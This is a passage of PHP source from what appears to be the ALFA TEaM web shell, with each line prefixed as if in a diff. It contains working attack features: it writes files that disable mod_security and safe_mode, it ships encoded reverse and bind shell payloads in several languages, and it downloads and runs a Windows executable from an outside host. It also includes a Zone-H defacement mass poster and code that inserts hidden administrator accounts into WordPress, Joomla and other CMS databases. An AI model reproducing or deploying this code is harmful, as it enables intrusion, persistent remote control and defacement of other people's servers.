- if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:";
- }print "\n";
- }} } else{__alert('bypass failed...');
- }} if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){ @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
- echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
- } if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){ @__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPass By Sole Sad & Invisible(ALFA TEaM)");
- @__write_file($GLOBALS['cwd']."ini.php","<?\necho ini_get('safe_mode');
- \necho ini_get('open_basedir');
- \ninclude(\$_GET['file']);
- \nini_restore('safe_mode');
- \nini_restore('open_basedir');
- \necho ini_get('safe_mode');
- \necho ini_get('open_basedir');
- \ninclude(\$_GET['ss']);
- \n?>");
- echo '<center><b><big> php.ini && ini.php created...!</center></b></big>';
- } if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){ @__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
- echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
- } echo "<br></div>";
- alfafooter();
- } function __get_resource($content){ return @gzinflate(__ZGVjb2Rlcg($content));
- } function __write_file($file, $content){ if($fh = @fopen($file, "wb")){ if(fwrite($fh, $content)!==false) return true;
- } return false;
- } function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){ $res = "<font color='green'>[ Success...! ]</font>";
- $err = "<font color='red'>[ Failed...! ]</font>";
- if($evalOptions!="") $evalOptions = $evalOptions." ";
- if($evalArguments!="") $evalArguments = " ".$evalArguments;
- if($evalType=="c"){ $tmpdir = ALFA_TEMPDIR;
- chdir($tmpdir);
- if(is_writable($tmpdir)){ $uniq = substr(md5(time()),0,8);
- $filename = $evalType.$uniq.".c";
- $path = $filename;
- if(__write_file($path, $evalCode)){ $ext = ($GLOBALS['sys']=='win')? ".exe":".out";
- $pathres = $filename.$ext;
- $evalOptions = "-o ".$pathres." ".$evalOptions;
- $cmd = "gcc ".$evalOptions.$path;
- alfaEx($cmd);
- if(is_file($pathres)){ if(chmod($pathres, 0755)){ $cmd = $pathres.$evalArguments;
- alfaEx($cmd);
- }else{$res = $err;
- } unlink($pathres);
- }else{$res = $err;
- } unlink($path);
- }else{$res = $err;
- } } return $res;
- }elseif($evalType=="java"){ $tmpdir = ALFA_TEMPDIR;
- chdir($tmpdir);
- if(is_writable($tmpdir)){ if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){ $classname = trim($r[1]);
- $filename = $classname;
- }else{ $uniq = substr(md5(time()),0,8);
- $filename = $evalType.$uniq;
- $evalCode = "class ".$filename." { ".$evalCode . " } ";
- } $path = $filename.".java";
- if(__write_file($path, $evalCode)){ $cmd = "javac ".$evalOptions.$path;
- alfaEx($cmd);
- $pathres = $filename.".class";
- if(is_file($pathres)){ if(chmod($pathres, 0755)){ $cmd = "java ".$filename.$evalArguments;
- alfaEx($cmd);
- }else{$res = $err;
- } unlink($pathres);
- }else{$res = $err;
- } unlink($path);
- }else{$res = $err;
- } } return $res;
- } return false;
- } function alfaconnect(){ alfahead();
- $php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
- $python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
- $perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
- $ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
- $node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
- $c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
- $java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
- $alfacgi="fZFPawIxEMXvgt9hGgX14IZC6WFdl1YpxYO3HgVJdsd1af4sSZTupZ+9SXaRBYunJO/3MjO8mTzRizWU14o2aAQsd/EtdMEE5UyVktVqPJpYLfBa25oLfKu8JpJCy/HoYhG2n7tVd9vv9h9pumEWX1+8NB41plYOyFYrh8otXdtgCg5/HD07KQ7qoMjq5sqClg8FVzuB+bs4MfhCJn9DK9hsM9qBoZXrsgVeFVpos55xwYrvWTTIFqaCqQpgDQavaLqJ0/RixLFhhsk5CZwserN65FQ3GzMPS3ocrV3vNZRY6BKPPGYzj2rE6p6pCEL9O+TFAG1rHfomWJw1PEPup7CJkw0ZwNgiIUCSqeqO/nNMbE6yk18K9HkZLH1ayb9/EpLR4M3JYpA3DYHnGe139gc=";
- echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
- echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);
- return false;
- \">
- <div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);
- ' style='width:120px;
- '><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
- $cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
- foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");
- } echo "</select> <div id='bcipAction' style='display:inline-block;
- '><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;
- ' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;
- ' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
- if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){ $lang = $_POST['alfa1'];
- $ip = $_POST['alfa2'];
- $port = $_POST['alfa3'];
- $arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
- $tmpdir = ALFA_TEMPDIR;
- $name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
- $allow = array('perl','ruby','python','node');
- eval('$lan=$'.$lang.';
- ');
- if(in_array($lang,$allow)){ if(__write_file($name,__get_resource($lan))){ if(strlen(alfaEx('whoami'))>0){ $os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
- $out = alfaEx("$lang $name $arg $os");
- if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";
- } echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
- @unlink($name);
- }else{ @mkdir('cgialfa',0755);
- @chdir('cgialfa');
- alfacgihtaccess('cgi');
- __write_file('bc.alfa',__get_resource($alfacgi));
- @chmod("bc.alfa", 0755);
- if(substr($name,0,1)=='.'){$name='.'.$name;
- } echo("<pre class=ml1 style='margin-top:5px'>");
- echo AlfaiFrameCreator("cgialfa/bc.alfa?arg=".strrev(__ZW5jb2Rlcg($arg))."&lang=".strrev(__ZW5jb2Rlcg($lang))."&n=".strrev(__ZW5jb2Rlcg($name)),'0','0');
- echo("<center><font color='green'>[ Finished...! ]</font>");
- echo("</pre>");
- } }else{ echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
- } } if($lang=='java'||$lang=='c'){ $code = __get_resource($lan);
- $out = nl2br(bcinit($lang, $code,'',''));
- echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
- } if($lang=='bcwin'){ $alfa = new AlfaCURL();
- $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
- $tmpdir = ALFA_TEMPDIR;
- $f = @fopen($tmpdir.'/bcwin.exe','w+');
- @fwrite($f, $s);
- @fclose($f);
- $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
- @unlink($tmpdir.'/bcwin.exe');
- } if($lang=='php'){ echo "<pre class=ml1 style='margin-top:5px'>";
- $code = __get_resource($lan);
- if($code!==false){ $code = "\$target = \"".$arg."\";
- \n".$code;
- eval($code);
- echo("<center><font color='green'>[ Finished...! ]</font></center>");
- } echo "</pre>";
- } } echo "</div>";
- alfafooter();
- } function alfazoneh(){ alfahead();
- echo '<div class=header>';
- if(!function_exists('curl_version')){ echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
- } $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
- $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
- echo '
- <center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
- <form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\');
- return false;
- ">
- <input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
- <br>
- <select id="text" name="hackmode" style="width:400px;
- ">';
- $x=1;
- foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);
- " value="'.$x.'">'.$mode.'</option>');
- $x++;
- } echo '</select><br><select id="text" name="reason" style="width:200px;
- ">';
- $x=1;
- foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);
- " value="'.$x.'">'.$mode.'</option>');
- $x++;
- } echo '</select><br>
- <textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
- <p><input type="submit" value=" " name="go" /></p>
- </form></center>';
- if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){ ob_start();
- $hacker = $_POST['alfa1'];
- $method = $_POST['alfa2'];
- $neden = $_POST['alfa3'];
- $site = $_POST['alfa4'];
- if(empty($hacker)){ die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
- }elseif($method == "------------------------------------SELECT-------------------------------------"){ die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
- }elseif($neden == "------------------------------------SELECT-------------------------------------"){ die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
- }elseif(empty($site)){ die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
- } $i = 0;
- $sites = explode("\n", $site);
- $alfa = new AlfaCURL();
- while($i < count($sites)){ if(substr($sites[$i], 0, 4) != "http"){ $sites[$i] = "http://".$sites[$i];
- } $alfa->Send("http://www.zone-h.com/notify/single","post","defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
- ++$i;
- } echo __pre()."<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
- } echo "</div>";
- alfafooter();
- } function alfapwchanger(){ alfahead();
- ALfaNum();
- echo '<div class=header><center><br><div class="txtfont_header">| Add New Admin |</div>
- <center><h3>';
- $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
- Alfa_Create_A_Tag('pwchanger',$vals);
- echo '</h3></center>';
- if(isset($_POST['alfa1'])&&$_POST['alfa1']=='wp'){ ALfaNum(1);
- echo __pre().'<center><center><div class="txtfont_header">| WordPress |</div>
- <p>'.getConfigHtml('wp').'</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id'=>'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form>';
- if ($_POST['alfa2'] && $_POST['alfa2'] == '>>'){ $localhost = $_POST['alfa3'];
- $database = $_POST['alfa4'];
- $username = $_POST['alfa5'];
- $password = $_POST['alfa6'];
- $admin = $_POST['alfa8'];
- $SQL = $_POST['alfa9'];
- $prefix = $_POST['alfa10'];
- $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
- $sole = @mysqli_num_rows($solevisible);
- if ($sole == 1){ $solevis = @mysqli_fetch_assoc($solevisible);
- $res = $solevis['ID'];
- } $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','last_name','solevisible')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','nickname','solevisible')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','description','solevisible')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','rich_editing','true')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','comment_shortcuts','false')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','admin_color','fresh')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','use_ssl','0')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_admin_bar_front','true')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_capabilities','a:1:{s:13:\"administrator\";
- b:1;
- }')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_user_level','10')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','dismissed_wp_pointers','wp330_toolbar,wp330_saving_widgets,wp340_choose_image_from_library,wp340_customize_current_theme_link,wp350_media')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','show_welcome_panel','1')") or die(mysqli_error($conn));
- $solevisible=@mysqli_query($conn,"insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','wp_dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
- if($solevisible){ __alert('Success... '.$admin.' is created...');
- } } } if($_POST['alfa2'] && $_POST['alfa2'] == 'joomla'){ ALfaNum(2);
- echo __pre().'<center><center><div class="txtfont_header">| Joomla |</div><p><p>'.getConfigHtml('joomla').'</p><form onSubmit="g(\'pwchanger\',null,\'>>\',\'joomla\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);
- return false;
- " method="POST">';
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') );
- create_table($table);
- echo '<p><input value=" " name="send" type="submit"></p></form></center>';
- if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa3'];
